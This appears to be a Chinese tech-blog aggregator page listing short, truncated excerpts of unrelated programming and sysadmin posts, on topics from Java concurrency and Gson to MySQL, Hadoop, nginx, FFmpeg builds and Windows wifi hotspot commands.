1.工厂模式 1.1 工厂方法模式 (由一个工厂类管理构造方法) 1.1.1普通工厂模式(一个工厂类中只有一个方法) 1.1.2多工厂模式(一个工厂类中有多个方法) 1.1.3静态工厂模式(将工厂类中的方法变成静态方法) &n
实例：供应商管理报表需求调研报告老A不折腾 finereport 报表系统报表软件信息化选型
引言随着企业集团的生产规模扩张，为支撑全球供应链管理，对于供应商的管理和采购过程的监控已经不局限于简单的交付以及价格的管理，目前采购及供应商管理各个环节的操作分别在不同的系统下进行，而各个数据源都独立存在，无法提供统一的数据支持；因此，为了实现对于数据分析以提供采购决策，建立报表体系成为必须。业务目标 1、通过报表为采购决策提供数据分析与支撑 2、对供应商进行综合评估以及管理，合理管理和
mysql 林鹤霄
转载源：http://blog.sina.com.cn/s/blog_4f925fc30100rx5l.html mysql -uroot -p ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: YES) [root@centos var]# service mysql
Linux下多线程堆栈查看工具(pstree、ps、pstack) aigo linux
原文：http://blog.csdn.net/yfkiss/article/details/6729364 1. pstree pstree以树结构显示进程$ pstree -p work | grep adsshd(22669)---bash(22670)---ad_preprocess(4551)-+-{ad_preprocess}(4552) &n
html input与textarea 值改变事件 alxw4616 JavaScript
// 文本输入框(input) 文本域(textarea)值改变事件 // onpropertychange(IE) oninput(w3c) $('input,textarea').on('propertychange input', function(event) { console.log($(this).val()) });
String类的基本用法百合不是茶 String
字符串的用法; // 根据字节数组创建字符串 byte[] by = { 'a', 'b', 'c', 'd' }; String newByteString = new String(by); 1,length() 获取字符串的长度 &nbs
JDK1.5 Semaphore实例 bijian1013 java thread java多线程 Semaphore
Semaphore类一个计数信号量。从概念上讲，信号量维护了一个许可集合。如有必要，在许可可用前会阻塞每一个 acquire()，然后再获取该许可。每个 release() 添加一个许可，从而可能释放一个正在阻塞的获取者。但是，不使用实际的许可对象，Semaphore 只对可用许可的号码进行计数，并采取相应的行动。 S
使用GZip来压缩传输量 bijian1013 java GZip
启动GZip压缩要用到一个开源的Filter：PJL Compressing Filter。这个Filter自1.5.0开始该工程开始构建于JDK5.0，因此在JDK1.4环境下只能使用1.4.6。 PJL Compressi
【Java范型三】Java范型详解之范型类型通配符 bit1129 java
定义如下一个简单的范型类， package com.tom.lang.generics; public class Generics<T> { private T value; public Generics(T value) { this.value = value; } }
【Hadoop十二】HDFS常用命令 bit1129 hadoop
1. 修改日志文件查看器 hdfs oev -i edits_0000000000000000081-0000000000000000089 -o edits.xml cat edits.xml 修改日志文件转储为xml格式的edits.xml文件，其中每条RECORD就是一个操作事务日志 2. fsimage查看HDFS中的块信息等 &nb
怎样区别nginx中rewrite时break和last ronin47
在使用nginx配置rewrite中经常会遇到有的地方用last并不能工作，换成break就可以，其中的原理是对于根目录的理解有所区别，按我的测试结果大致是这样的。 location / { proxy_pass http://test;
java-21.中兴面试题输入两个整数 n 和 m ，从数列 1 ， 2 ， 3.......n 中随意取几个数 , 使其和等于 m bylijinnan java
import java.util.ArrayList; import java.util.List; import java.util.Stack; public class CombinationToSum { /* 第21 题 2010 年中兴面试题编程求解：输入两个整数 n 和 m ，从数列 1 ， 2 ， 3.......n 中随意取几个数 , 使其和等
eclipse svn 帐号密码修改问题开窍的石头 eclipse SVN svn帐号密码修改
问题描述： Eclipse的SVN插件Subclipse做得很好，在svn操作方面提供了很强大丰富的功能。但到目前为止，该插件对svn用户的概念极为淡薄，不但不能方便地切换用户，而且一旦用户的帐号、密码保存之后，就无法再变更了。解决思路：删除subclipse记录的帐号、密码信息，重新输入
[电子商务]传统商务活动与互联网的结合 comsci 电子商务
某一个传统名牌产品，过去销售的地点就在某些特定的地区和阶层，现在进入互联网之后，用户的数量群突然扩大了无数倍，但是，这种产品潜在的劣势也被放大了无数倍，这种销售利润与经营风险同步放大的效应，在最近几年将会频繁出现。。。。如何避免销售量和利润率增加的
java 解析 properties-使用 Properties-可以指定配置文件路径 cuityang java properties
#mq xdr.mq.url=tcp://192.168.100.15:61618; import java.io.IOException; import java.util.Properties; public class Test { String conf = "log4j.properties"; private static final
Java核心问题集锦 darrenzhu java 基础核心难点
注意，这里的参考文章基本来自Effective Java和jdk源码 1)ConcurrentModificationException 当你用for each遍历一个list时，如果你在循环主体代码中修改list中的元素，将会得到这个Exception，解决的办法是： 1)用listIterator, 它支持在遍历的过程中修改元素， 2)不用listIterator, new一个
1分钟学会Markdown语法 dcj3sjt126com markdown
markdown 简明语法基本符号 *,-,+ 3个符号效果都一样，这3个符号被称为 Markdown符号空白行表示另起一个段落 `是表示inline代码，tab是用来标记代码段，分别对应html的code，pre标签换行单一段落( <p>) 用一个空白行连续两个空格会变成一个 <br> 连续3个符号，然后是空行
Gson使用二（GsonBuilder） eksliang json gson GsonBuilder
转载请出自出处：http://eksliang.iteye.com/blog/2175473 一.概述 GsonBuilder用来定制java跟json之间的转换格式二.基本使用实体测试类：温馨提示：默认情况下@Expose注解是不起作用的,除非你用GsonBuilder创建Gson的时候调用了GsonBuilder.excludeField
报ClassNotFoundException: Didn't find class "...Activity" on path: DexPathList gundumw100 android
有一个工程，本来运行是正常的，我想把它移植到另一台PC上，结果报： java.lang.RuntimeException: Unable to instantiate activity ComponentInfo{com.mobovip.bgr/com.mobovip.bgr.MainActivity}: java.lang.ClassNotFoundException: Didn't f
JavaWeb之JSP指令 ihuning javaweb
要点 JSP指令简介 page指令 include指令 JSP指令简介 JSP指令（directive）是为JSP引擎而设计的，它们并不直接产生任何可见输出，而只是告诉引擎如何处理JSP页面中的其余部分。 JSP指令的基本语法格式： <%@ 指令属性名="
mac上编译FFmpeg跑ios 啸笑天 ffmpeg
1、下载文件：https://github.com/libav/gas-preprocessor，复制gas-preprocessor.pl到/usr/local/bin/下，修改文件权限：chmod 777 /usr/local/bin/gas-preprocessor.pl 2、安装yasm-1.2.0 curl http://www.tortall.net/projects/yasm
sql mysql oracle中字符串连接 macroli oracle sql mysql SQL Server
有的时候，我们有需要将由不同栏位获得的资料串连在一起。每一种资料库都有提供方法来达到这个目的： MySQL: CONCAT() Oracle: CONCAT(), || SQL Server: + CONCAT() 的语法如下： Mysql 中 CONCAT(字串1, 字串2, 字串3, ...): 将字串1、字串2、字串3，等字串连在一起。请注意，Oracle的CON
Git fatal: unab SSL certificate problem: unable to get local issuer ce rtificate qiaolevip 学习永无止境每天进步一点点 git 纵观千象
// 报错如下： $ git pull origin master fatal: unable to access 'https://git.xxx.com/': SSL certificate problem: unable to get local issuer ce rtificate // 原因：由于git最新版默认使用ssl安全验证，但是我们是使用的git未设
windows命令行设置wifi surfingll windows wifi 笔记本wifi
还没有讨厌无线wifi的无尽广告么，还在耐心等待它慢慢启动么教你命令行设置笔记本电脑wifi： 1、开启wifi命令 netsh wlan set hostednetwork mode=allow ssid=surf8 key=bb123456 netsh wlan start hostednetwork pause 其中pause是等待输入，可以去掉 2、
Linux（Ubuntu）下安装sysv-rc-conf wmlJava linux ubuntu sysv-rc-conf
安装：sudo apt-get install sysv-rc-conf 使用：sudo sysv-rc-conf 操作界面十分简洁，你可以用鼠标点击，也可以用键盘方向键定位，用空格键选择，用Ctrl+N翻下一页，用Ctrl+P翻上一页，用Q退出。背景知识 sysv-rc-conf是一个强大的服务管理程序，群众的意见是sysv-rc-conf比chkconf
svn切换环境，重发布应用多了javaee标签前缀 zengshaotao javaee
更换了开发环境，从杭州，改变到了上海。svn的地址肯定要切换的，切换之前需要将原svn自带的.svn文件信息删除，可手动删除，也可通过废弃原来的svn位置提示删除.svn时删除。然后就是按照最新的svn地址和规范建立相关的目录信息，再将原来的纯代码信息上传到新的环境。然后再重新检出，这样每次修改后就可以看到哪些文件被修改过，这对于增量发布的规范特别有用。检出